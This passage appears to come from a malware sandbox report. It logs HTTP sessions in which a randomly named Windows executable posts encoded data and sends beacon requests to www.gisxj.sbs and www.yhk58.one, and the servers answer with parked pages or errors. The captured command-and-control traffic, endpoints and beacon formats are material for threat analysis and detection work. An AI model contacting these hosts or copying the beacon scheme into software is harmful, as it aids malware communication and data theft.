Jan 10, 2025 16:41:28.635329962 CET	305	IN	HTTP/1.1 405 Not Allowed date: Fri, 10 Jan 2025 15:41:28 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49989	91.195.240.123	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:30.548933029 CET	761	OUT	POST /bzmd/ HTTP/1.1 Host: www.gisxj.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.gisxj.sbs Referer: http://www.gisxj.sbs/bzmd/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 63 76 57 59 30 73 55 37 4c 42 69 77 49 5a 4d 78 49 66 4a 70 2f 50 44 58 53 71 44 42 73 48 52 45 33 44 63 75 62 39 57 4c 59 51 49 67 77 7a 4d 6f 50 74 76 4c 54 73 65 64 59 59 75 44 45 74 53 2f 38 73 4d 34 48 4e 66 66 66 46 48 65 62 30 47 78 4b 41 33 31 56 44 72 48 31 30 34 61 38 38 62 79 47 72 66 47 42 4b 51 7a 79 53 32 7a 4a 56 33 44 66 2f 68 6c 59 62 69 63 64 39 57 49 64 76 51 69 42 76 38 4d 5a 34 5a 6d 6a 7a 79 65 65 69 69 6e 6d 6f 4b 49 39 4a 2f 78 73 71 39 52 32 41 46 76 69 34 56 67 71 7a 63 6a 59 58 65 41 53 5a 35 34 63 50 32 4f 46 63 62 70 51 56 31 42 58 48 51 53 5a 64 78 4c 4b 4f 73 73 50 42 2b 46 4d 4a 53 73 33 45 53 4f 70 2f 32 64 7a 57 73 67 Data Ascii: LH1t=cvWY0sU7LBiwIZMxIfJp/PDXSqDBsHRE3Dcub9WLYQIgwzMoPtvLTsedYYuDEtS/8sM4HNfffFHeb0GxKA31VDrH104a88byGrfGBKQzyS2zJV3Df/hlYbicd9WIdvQiBv8MZ4ZmjzyeeiinmoKI9J/xsq9R2AFvi4VgqzcjYXeASZ54cP2OFcbpQV1BXHQSZdxLKOssPB+FMJSs3ESOp/2dzWsg
Jan 10, 2025 16:41:31.180505037 CET	305	IN	HTTP/1.1 405 Not Allowed date: Fri, 10 Jan 2025 15:41:31 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49990	91.195.240.123	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:33.096592903 CET	1778	OUT	POST /bzmd/ HTTP/1.1 Host: www.gisxj.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.gisxj.sbs Referer: http://www.gisxj.sbs/bzmd/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 63 76 57 59 30 73 55 37 4c 42 69 77 49 5a 4d 78 49 66 4a 70 2f 50 44 58 53 71 44 42 73 48 52 45 33 44 63 75 62 39 57 4c 59 51 51 67 77 6d 41 6f 65 2b 58 4c 53 73 65 64 48 6f 75 43 45 74 54 74 38 6f 68 78 48 4e 53 69 66 48 50 65 61 57 65 78 4d 31 58 31 66 44 72 48 76 55 34 62 34 38 62 6e 47 71 7a 43 42 4b 41 7a 79 53 32 7a 4a 51 7a 44 57 4f 68 6c 65 62 69 66 55 64 57 55 5a 76 51 61 42 76 30 32 5a 37 31 4d 6a 43 4f 65 65 43 53 6e 31 71 69 49 30 4a 2f 2f 72 71 39 4a 32 41 4a 77 69 34 49 66 71 7a 70 30 59 56 65 41 51 6f 55 67 41 63 4b 59 65 64 36 57 4a 79 5a 71 53 77 6c 7a 66 66 4e 52 50 4a 63 6b 4a 6e 32 7a 41 72 4f 43 6a 44 44 59 34 4c 43 52 33 44 35 68 71 75 52 68 51 58 68 75 38 71 55 6b 39 52 57 41 76 31 75 6f 75 70 79 47 52 75 68 31 32 44 61 6f 41 47 37 54 77 5a 6c 65 37 6a 70 5a 44 4e 73 72 68 57 31 37 4d 6f 6e 5a 69 66 71 34 73 57 39 4c 33 6f 33 51 45 39 38 42 6b 44 43 49 75 5a 30 65 51 55 7a 51 54 50 75 69 46 43 5a 32 61 61 57 2b 35 34 57 44 4a 2b 4c 70 77 33 4d 53 43 4f 2b 53 48 [TRUNCATED] Data Ascii: LH1t=cvWY0sU7LBiwIZMxIfJp/PDXSqDBsHRE3Dcub9WLYQQgwmAoe+XLSsedHouCEtTt8ohxHNSifHPeaWexM1X1fDrHvU4b48bnGqzCBKAzyS2zJQzDWOhlebifUdWUZvQaBv02Z71MjCOeeCSn1qiI0J//rq9J2AJwi4Ifqzp0YVeAQoUgAcKYed6WJyZqSwlzffNRPJckJn2zArOCjDDY4LCR3D5hquRhQXhu8qUk9RWAv1uoupyGRuh12DaoAG7TwZle7jpZDNsrhW17MonZifq4sW9L3o3QE98BkDCIuZ0eQUzQTPuiFCZ2aaW+54WDJ+Lpw3MSCO+SHoSuQsjQArMdbv/1eD96Vzt2dCN9AdLl4aesKoEXo9dBrSVh+MBbIxrfqIpZFWP9iddvzYg7WdewfL9J/acFRvJevpI0Chq0aR3oqduZaC6+aJCvzUwwWgZbyaKu561jrqjlnfKBohY3YfmH8WQBkYUX0bWGaR96ypthq3F0AaW+XRO7BMKEZ9E2usZ4LNlyGL3aw6AewVq7safJ+4ENX6WCL3mttuvIDMF7Gl7jFGD1fKs31ZBBAlspM6tMY0LuV6vFsgf2y1K9GLReDCqKCPR13REFWEAHjg9EhVOdB/Cn9I1lKsFQzKm9d+wHkTmZr0yR6MOVaMi4nc3cuDhGUNlnUNDQt126d1IDHcspiMD9L47Y3Hpc1n+kalI6RLKqAGTy7kWt4wbkrhxHHpj6MQ6V/AQNqFw78jHmeDIBlQpul62af1Gj4KtfvIQUH1jp8XfSPUXKLTHNd4gj5iXjBK1s4weHY3AV50JguAS50niZ5ezcmDY1bo6ZoIFIuXsryInWlq4u/OIq2WqJCIhpTGENMgttgFPolNEg6ll6+ex85UtPyIHZ30xDk37Xh3LKa+fMC3h/8/S80bMBVzGzZ4BjaY47TlAjr6Wq2CJuOzLd7eu6gGP1/x2L9K0CZZ5fkORvT2FvAmIRvgGb2/Im9g3EFFnIiuYuTEf [TRUNCATED]
Jan 10, 2025 16:41:33.724426031 CET	305	IN	HTTP/1.1 405 Not Allowed date: Fri, 10 Jan 2025 15:41:33 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49991	91.195.240.123	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:35.650811911 CET	498	OUT	GET /bzmd/?LH1t=Rt+43bg4Ok23e54YRfAH+vyFRMP1sUgI2DMHftvVCAd/nWF0JqXCSMibGLO2dcXMoNINCP/gJGrlf22QDBjVZjqHznYH4uPEIO/lAdIm4TOVCBTzftZlepKPWee8U8pSUA==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.gisxj.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:41:36.710522890 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:41:36 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_C6x9a/CXBt8sxCjXNhzBLlgIYtJiRsfOOZgCtIjh0ghIzliVLv+cZ48/hfeZCOpYPYlqCW1RZxCb3eVUh6fbBg== last-modified: Fri, 10 Jan 2025 15:41:36 GMT x-cache-miss-from: parking-7df97dc48-bkx6q server: Parking/1.0 connection: close Data Raw: 32 45 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 43 36 78 39 61 2f 43 58 42 74 38 73 78 43 6a 58 4e 68 7a 42 4c 6c 67 49 59 74 4a 69 52 73 66 4f 4f 5a 67 43 74 49 6a 68 30 67 68 49 7a 6c 69 56 4c 76 2b 63 5a 34 38 2f 68 66 65 5a 43 4f 70 59 50 59 6c 71 43 57 31 52 5a 78 43 62 33 65 56 55 68 36 66 62 42 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 69 73 78 6a 2e 73 62 73 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 69 73 78 6a 20 52 65 73 6f [TRUNCATED] Data Ascii: 2E4<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_C6x9a/CXBt8sxCjXNhzBLlgIYtJiRsfOOZgCtIjh0ghIzliVLv+cZ48/hfeZCOpYPYlqCW1RZxCb3eVUh6fbBg==><head><meta charset="utf-8"><title>gisxj.sbs - gisxj Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gisxj.sbs is your first and best source for information about gisxj. Here you will
Jan 10, 2025 16:41:36.710551023 CET	224	IN	Data Raw: 61 6c 73 6f 20 66 69 6e 64 20 74 6f 70 69 63 73 20 72 65 6c 61 74 69 6e 67 20 74 6f 20 69 73 73 75 65 73 20 6f 66 20 67 65 6e 65 72 61 6c 20 69 6e 74 65 72 65 73 74 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20 66 69 6e 64 20 77 68 61 74 20 79 6f 75 Data Ascii: also find topics relating to issues of general interest. We hope you find what you are looking for!"><link rel="icon" type="image/png" 597 href="//img.sedoparking.com/templates/logos/sedo_logo.png"
Jan 10, 2025 16:41:36.710561991 CET	1236	IN	Data Raw: 0a 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 73 72 63 3d 22 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6a 73 5f 70 72 65 Data Ascii: /></head><body><img width="16" height="16" src="img.sedoparking.com/images/js_preloader.gif"/><script type="text/javascript"> var request = new XMLHttpRequest(); request.open('GET', "\/\/www.gisxj.sbs/search/tsc.php?ses\u003DogcRp81H1
Jan 10, 2025 16:41:36.710572958 CET	840	IN	Data Raw: 6c 64 49 42 6f 50 59 61 31 72 32 77 34 75 6a 42 5f 63 43 59 41 76 51 45 50 75 67 64 71 6a 75 4e 74 4b 76 50 4a 69 62 6f 44 30 37 78 5a 6d 75 39 56 37 45 66 72 6a 77 42 73 6e 74 56 71 41 67 51 72 5a 53 46 77 67 4b 36 50 6d 32 75 56 36 75 37 30 6d Data Ascii: ldIBoPYa1r2w4ujB_cCYAvQEPugdqjuNtKvPJiboD07xZmu9V7EfrjwBsntVqAgQrZSFwgK6Pm2uV6u70m5oWUsnhLy\u002DRaBucwP\u002Dr\u002DLlSNaVNkeMl3u4U4OG2B3VQOeoZiHzlrNoU3R6jMBM\u002DjrmAiOoWegqEDOkxdc1TItfManzPHdzQo1boWV0vl8ToC5Z54Q6CvkWNZFXjAutOObQIxISaE4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49992	38.181.21.54	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:41.883568048 CET	741	OUT	POST /6gca/ HTTP/1.1 Host: www.yhk58.one Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.yhk58.one Referer: http://www.yhk58.one/6gca/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 53 4d 54 31 73 4d 64 66 6d 66 57 36 65 45 42 69 6c 56 53 5a 6d 6d 32 30 6f 68 53 4d 74 34 39 43 4e 45 63 69 30 66 4a 7a 31 4c 48 45 67 55 4c 38 55 73 70 78 30 66 30 6b 58 71 56 58 6e 4c 62 7a 4e 7a 31 54 48 75 59 6b 37 69 41 56 6b 65 48 34 48 78 55 72 36 64 64 50 79 56 62 4e 38 4a 38 49 6d 37 59 55 34 4a 5a 64 62 6d 37 6c 47 70 6a 45 2b 58 49 64 66 68 48 49 30 33 6c 76 4b 38 38 71 45 47 30 4a 54 46 59 39 4c 31 57 38 4c 57 37 6f 76 59 64 56 58 61 39 32 72 47 59 6d 68 45 55 61 6a 61 4c 47 58 6d 5a 67 42 62 56 61 79 69 6c 44 53 50 44 6f 59 2b 31 57 68 79 32 78 74 35 79 4b 67 42 37 2b 59 30 55 3d Data Ascii: LH1t=SMT1sMdfmfW6eEBilVSZmm20ohSMt49CNEci0fJz1LHEgUL8Uspx0f0kXqVXnLbzNz1THuYk7iAVkeH4HxUr6ddPyVbN8J8Im7YU4JZdbm7lGpjE+XIdfhHI03lvK88qEG0JTFY9L1W8LW7ovYdVXa92rGYmhEUajaLGXmZgBbVayilDSPDoY+1Why2xt5yKgB7+Y0U=
Jan 10, 2025 16:41:42.736675978 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:41:42 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66946a48-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49993	38.181.21.54	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:44.440283060 CET	761	OUT	POST /6gca/ HTTP/1.1 Host: www.yhk58.one Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.yhk58.one Referer: http://www.yhk58.one/6gca/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 53 4d 54 31 73 4d 64 66 6d 66 57 36 65 6b 52 69 6a 30 53 5a 78 32 32 37 30 52 53 4d 6e 59 39 38 4e 45 59 69 30 62 34 6f 30 35 7a 45 68 30 62 38 56 74 70 78 35 2f 30 6b 50 36 56 59 6a 4c 62 34 4e 7a 35 62 48 75 55 6b 37 69 55 56 6b 62 6a 34 48 41 55 6b 36 4e 64 4e 2b 31 62 4c 79 70 38 49 6d 37 59 55 34 4e 35 7a 62 6d 6a 6c 61 49 54 45 2f 79 30 65 56 42 48 4c 7a 33 6c 76 4f 38 38 6d 45 47 30 72 54 42 51 45 4c 33 75 38 4c 54 48 6f 68 70 64 57 43 4b 39 4b 76 47 59 7a 70 47 70 34 6e 4b 62 68 4b 31 39 50 46 62 4e 44 2b 30 55 70 49 74 4c 75 62 2b 64 39 68 78 65 48 6f 4f 76 69 36 69 72 4f 47 6a 41 47 39 33 44 35 4f 44 56 4d 67 4c 35 71 52 64 68 74 66 6d 6a 5a Data Ascii: LH1t=SMT1sMdfmfW6ekRij0SZx2270RSMnY98NEYi0b4o05zEh0b8Vtpx5/0kP6VYjLb4Nz5bHuUk7iUVkbj4HAUk6NdN+1bLyp8Im7YU4N5zbmjlaITE/y0eVBHLz3lvO88mEG0rTBQEL3u8LTHohpdWCK9KvGYzpGp4nKbhK19PFbND+0UpItLub+d9hxeHoOvi6irOGjAG93D5ODVMgL5qRdhtfmjZ
Jan 10, 2025 16:41:45.335016966 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:41:45 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66946a48-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49994	38.181.21.54	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:46.981390953 CET	1778	OUT	POST /6gca/ HTTP/1.1 Host: www.yhk58.one Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.yhk58.one Referer: http://www.yhk58.one/6gca/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 53 4d 54 31 73 4d 64 66 6d 66 57 36 65 6b 52 69 6a 30 53 5a 78 32 32 37 30 52 53 4d 6e 59 39 38 4e 45 59 69 30 62 34 6f 30 35 72 45 68 48 44 38 61 71 46 78 34 2f 30 6b 52 71 56 62 6a 4c 62 6c 4e 7a 78 66 48 76 6f 4f 37 67 73 56 69 39 2f 34 42 7a 4d 6b 77 4e 64 4e 32 56 62 4f 38 4a 38 5a 6d 37 49 51 34 4a 64 7a 62 6d 6a 6c 61 4c 4c 45 34 6e 49 65 54 42 48 49 30 33 6c 72 4b 38 38 43 45 41 64 55 54 42 63 4c 49 47 4f 38 46 53 33 6f 74 37 31 57 66 36 39 79 69 6d 5a 32 70 47 6c 4f 6e 4b 48 48 4b 30 5a 6c 46 5a 4e 44 37 42 74 46 55 76 48 6f 42 2f 56 54 6f 54 61 7a 70 4d 65 41 77 6b 37 75 50 30 30 79 7a 67 44 77 47 42 52 6b 30 4b 77 34 53 38 5a 64 66 7a 76 52 33 6a 43 4b 4d 79 79 4e 65 54 6f 32 53 64 31 69 65 4d 57 36 77 4d 34 49 55 50 52 6e 62 4d 6a 6c 48 69 34 62 50 73 61 75 55 6b 43 36 65 5a 52 4e 48 54 2b 5a 4a 77 51 5a 2b 58 76 70 68 5a 67 58 56 51 6b 52 6c 75 4e 49 2f 65 67 62 33 6f 47 62 2b 50 33 61 6f 66 6e 73 48 42 6c 73 68 56 37 68 34 34 67 5a 4d 78 66 36 58 55 4f 59 35 75 56 73 43 [TRUNCATED] Data Ascii: LH1t=SMT1sMdfmfW6ekRij0SZx2270RSMnY98NEYi0b4o05rEhHD8aqFx4/0kRqVbjLblNzxfHvoO7gsVi9/4BzMkwNdN2VbO8J8Zm7IQ4JdzbmjlaLLE4nIeTBHI03lrK88CEAdUTBcLIGO8FS3ot71Wf69yimZ2pGlOnKHHK0ZlFZND7BtFUvHoB/VToTazpMeAwk7uP00yzgDwGBRk0Kw4S8ZdfzvR3jCKMyyNeTo2Sd1ieMW6wM4IUPRnbMjlHi4bPsauUkC6eZRNHT+ZJwQZ+XvphZgXVQkRluNI/egb3oGb+P3aofnsHBlshV7h44gZMxf6XUOY5uVsCbge8Nzi8wALmlwO9puR3R+4VSEJ7LqplV90rwXtzSk/5RY29G91SwOrZxocwBch23/BNyuIa1Bvlwi0VF6kyFIuTOC6aoctj16GioQFmrCRFYI8nx6sUCbib6/8sdAK95xHg3jiw5FPyw+PMDrZSQ62LBQ8EdeIp9VzARcezXT0aXvkPTc8ewb3ESBltfcY0bwKcMMDPU+A40Lr4Ya48frkOr8TKujd735BBAY/lxRmDk4vIVMSg3dtjZfGepTd/HtZ8qvyENy+wdhr5sHebrzruIJ5JhBE1a4DprHY2ZO1NwyNK5OJetCtHhHB79EvFF+/rVeh09B2VShffXNyuk39ibjtLuqOd0BnUMqNKR5uA3ZknOVqLKf3yAbQeDbLLHvyr0caW6KTETMxTuahGr1oI6ED36D61h8F2rrA9pDRpCnwiqLvwrKjclrsa5qvLjhmKGVKQDXUt0iiwDTBVMyLHPUuAMLYD48PYP0CbLIQysHPjgpP0s3oR7OycrpKVvDWSYPhHCdkOJxGEcQwGknZ26/i6qri/x6MC1Gn/lxut4xW4Zg2qCIO0MQLV+fCWGNmFRYMloTsmmaKA3Gssl9pbRhbpYtFyQvBr2WlpNRwVvGrF5ApD5vlX50VIGG3CctOpjk2G56c3HDlXyj4f4xUVLsRR2jHNmy [TRUNCATED]
Jan 10, 2025 16:41:48.083585024 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:41:47 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66946a48-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49995	38.181.21.54	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
